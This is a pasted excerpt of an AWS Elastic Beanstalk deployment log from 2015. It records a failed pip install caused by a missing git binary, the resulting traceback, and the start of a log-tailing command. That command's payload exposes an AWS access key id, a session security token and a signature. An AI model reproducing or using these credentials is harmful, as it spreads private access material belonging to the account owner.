  427. Requirement already satisfied (use --upgrade to upgrade): Markdown==2.6 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 2))
  428. Requirement already satisfied (use --upgrade to upgrade): MySQL-python==1.2.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 3))
  429. Requirement already satisfied (use --upgrade to upgrade): Pillow==2.7.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 4))
  430. Requirement already satisfied (use --upgrade to upgrade): PyYAML==3.11 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 5))
  431. Requirement already satisfied (use --upgrade to upgrade): boto==2.36.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 6))
  432. Requirement already satisfied (use --upgrade to upgrade): django-cors-headers==1.0.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 7))
  433. Requirement already satisfied (use --upgrade to upgrade): django-filter==0.9.2 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 8))
  434. Requirement already satisfied (use --upgrade to upgrade): django-rest-auth==0.3.4 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 9))
  435. Requirement already satisfied (use --upgrade to upgrade): django-rest-swagger==0.2.8 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 10))
  436. Requirement already satisfied (use --upgrade to upgrade): djangorestframework==3.0.5 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 11))
  437. Requirement already satisfied (use --upgrade to upgrade): six==1.9.0 in /opt/python/run/venv/lib/python2.7/site-packages (from -r /opt/python/ondeck/app/requirements.txt (line 12))
  438. Requirement already satisfied (use --upgrade to upgrade): wsgiref==0.1.2 in /usr/lib64/python2.7 (from -r /opt/python/ondeck/app/requirements.txt (line 13))
  439. Obtaining google-visualization-python from git+https://github.com/google/google-visualization-python#egg=google-visualization-python (from -r /opt/python/ondeck/app/requirements.txt (line 14))
  440. Cloning https://github.com/google/google-visualization-python to /opt/python/run/venv/src/google-visualization-python
  441. Error [Errno 2] No such file or directory while executing command git clone -q https://github.com/google/google-visualization-python /opt/python/run/venv/src/google-visualization-python
  442. Cannot find command 'git'
  443. 2015-07-21 19:37:21,730 ERROR Error installing dependencies: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1
  444. Traceback (most recent call last):
  445. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 22, in main
  446. install_dependencies()
  447. File "/opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py", line 18, in install_dependencies
  448. check_call('%s install -r %s' % (os.path.join(APP_VIRTUAL_ENV, 'bin', 'pip'), requirements_file), shell=True)
  449. File "/usr/lib64/python2.7/subprocess.py", line 540, in check_call
  450. raise CalledProcessError(retcode, cmd)
  451. CalledProcessError: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1 (Executor::NonZeroExitStatus)
  452.  
  453.  
  454. [2015-07-21T19:37:21.736Z] ERROR [29493] : Command CMD-AppDeploy failed!
  455. [2015-07-21T19:37:21.737Z] INFO [29493] : Command processor returning results:
  456. {"status":"FAILURE","api_version":"1.0","results":[{"status":"FAILURE","msg":"(TRUNCATED)...)\n File \"/usr/lib64/python2.7/subprocess.py\", line 540, in check_call\n raise CalledProcessError(retcode, cmd)\nCalledProcessError: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1. \nHook /opt/elasticbeanstalk/hooks/appdeploy/pre/03deploy.py failed. For more detail, check /var/log/eb-activity.log using console or EB CLI","returncode":1,"events":[{"msg":"Your requirements.txt is invalid. Snapshot your logs for details.","severity":"ERROR","timestamp":1437507441},{"msg":"Error installing dependencies: Command '/opt/python/run/venv/bin/pip install -r /opt/python/ondeck/app/requirements.txt' returned non-zero exit status 1","severity":"SYSTEM","timestamp":1437507441}]}],"truncated":"true"}
  457. [2015-07-21T19:41:53.541Z] DEBUG [29621] : Reading config file: /etc/elasticbeanstalk/.aws-eb-stack.properties
  458. [2015-07-21T19:41:53.541Z] INFO [29621] : Received command CMD-TailLogs: {"command_name":"CMD-TailLogs","execution_data":"{\"aws_access_key_id\":\"ASIAIMVOHOD3BU77G3ZQ\",\"policy\":\"eyJjb25kaXRpb25zIjpbWyJzdGFydHMtd2l0aCIsIiR4LWFtei1tZXRhLXB1Ymxpc2hfbWVjaGFuaXNtIiwiIl0sWyJlcSIsIiRhY2wiLCJwcml2YXRlIl0sWyJzdGFydHMtd2l0aCIsIiRrZXkiLCJyZXNvdXJjZXNcL2Vudmlyb25tZW50c1wvbG9nc1wvIl0sWyJlcSIsIiRidWNrZXQiLCJlbGFzdGljYmVhbnN0YWxrLXVzLWVhc3QtMS0wNDk1MzM1NDE3NTkiXSxbInN0YXJ0cy13aXRoIiwiJHgtYW16LXNlY3VyaXR5LXRva2VuIiwiIl0sWyJzdGFydHMtd2l0aCIsIiR4LWFtei1tZXRhLWZpbGVfbmFtZSIsIiJdLFsic3RhcnRzLXdpdGgiLCIkeC1hbXotbWV0YS10aW1lX3N0YW1wIiwiIl0sWyJzdGFydHMtd2l0aCIsIiR4LWFtei1tZXRhLWJhdGNoX2lkIiwiIl0sWyJzdGFydHMtd2l0aCIsIiRDb250ZW50LVR5cGUiLCIiXV0sImV4cGlyYXRpb24iOiIyMDE1LTA3LTIxVDIwOjExOjUxLjQ3NFoifQ==\",\"security_token\":\"AQoDYXdzEJX\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/\\\/wEa8AIhc6AxFjZ8TnOxUsv8cMH4js2zB0IfXy8n\\\/YqZaQ2U0IHWwPGH9mfdmH321eaZTaICI8BBIf9xRkdHd1Ds3lnjypv3eM\\\/swW83AMnUt0rXxK0XaFC02RGt45\\\/rcjv6JBP0UFmDJmFVVo+vueuRgwTPEJOqkXdQoi3Tq1hKwA1gf3ey\\\/rUv2mok2DtdjLK8dOnfAV9T+THUEnOVoYjvdhhn9GO2FhFkx+p5IULBRj7xo2j99tZUo0R76g5jeX7hlhBMLwrAcThfWZwtGc4q3RtvZw5ogBa0fuvnP\\\/ssAxKWnwqhkPFMDliaoYLp0CGA2+dA46XvJiKeco6DoJ2j7pY7LU6e9Mpu8W7I8i1T9OjhCzDUuMuvcs05tbo5DkPsp81yTthj72U7\\\/sNX6nElHhzzA4AXAH70n3ODDYpMlsOopg3KwNvFj1yAsVi8NO95eei+L0Bly7Um1lfbWYzQ4DuhGcBihslr4tmCniuPGyBekyCBvbqtBQ==\",\"signature\":\"+HkVjfVVD42h1cI5jKaWk1GsjEc=\"}","request_id":"886af9e1-2fe0-11e5-9949-b79a2a7441a0","resource_name":"AWSEBAutoScalingGroup","data":"886af9e1-2fe0-11e5-9949-b79a2a7441a0","instance_ids":["i-07dc30af"],"command_timeout":"600","api_version":"1.0"}
  459. [2015-07-21T19:41:53.541Z] DEBUG [29621] : Checking if the command processor should execute...
  460. [2015-07-21T19:41:53.542Z] DEBUG [29621] : Checking whether the command is applicable to instance (i-07dc30af)..
  461. [2015-07-21T19:41:53.542Z] INFO [29621] : Command is applicable to this instance (i-07dc30af)..
  462. [2015-07-21T19:41:53.542Z] DEBUG [29621] : Checking if the received command stage is valid..
  463. [2015-07-21T19:41:53.542Z] INFO [29621] : No stage_num in command. Valid stage..
  464. [2015-07-21T19:41:53.543Z] INFO [29621] : Command processor should execute command.
  465. [2015-07-21T19:41:53.543Z] DEBUG [29621] : Storing current stage..
  466. [2015-07-21T19:41:53.543Z] DEBUG [29621] : Stage_num does not exist. Not saving null stage. Returning..
  467. [2015-07-21T19:41:53.543Z] INFO [29621] : Executing command: CMD-TailLogs...
  468. [2015-07-21T19:41:53.543Z] DEBUG [29621] : Reading config file: /etc/elasticbeanstalk/.aws-eb-stack.properties
  469. [2015-07-21T19:41:53.543Z] DEBUG [29621] : Refreshing metadata..
  470. [2015-07-21T19:41:53.766Z] DEBUG [29621] : Refreshed environment metadata.
  471. [2015-07-21T19:41:53.766Z] DEBUG [29621] : Retrieving metadata for key: AWS::ElasticBeanstalk::Ext||_ContainerConfigFileContent||commands..
  472. [2015-07-21T19:41:53.767Z] DEBUG [29621] : Retrieving metadata for key: AWS::ElasticBeanstalk::Ext||_API||_Commands..
  473. [2015-07-21T19:41:53.768Z] INFO [29621] : Found enabled addons: ["logpublish"].
  474. [2015-07-21T19:41:53.769Z] INFO [29621] : Updating Command definition of addon logpublish.
  475. [2015-07-21T19:41:53.769Z] DEBUG [29621] : Loaded definition of Command CMD-TailLogs.
  476. [2015-07-21T19:41:53.769Z] INFO [29621] : Executing command CMD-TailLogs activities...
  477. [2015-07-21T19:41:53.769Z] DEBUG [29621] : Setting environment variables..
  478. [2015-07-21T19:41:53.769Z] INFO [29621] : Running AddonsBefore for command CMD-TailLogs...
  479. [2015-07-21T19:41:53.769Z] DEBUG [29621] : Running stages of Command CMD-TailLogs from stage 0 to stage 0...
  480. [2015-07-21T19:41:53.769Z] INFO [29621] : Running stage 0 of command CMD-TailLogs...
  481. [2015-07-21T19:41:53.769Z] DEBUG [29621] : Loaded 1 actions for stage 0.
  482. [2015-07-21T19:41:53.769Z] INFO [29621] : Running 1 of 1 actions: TailLogs...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement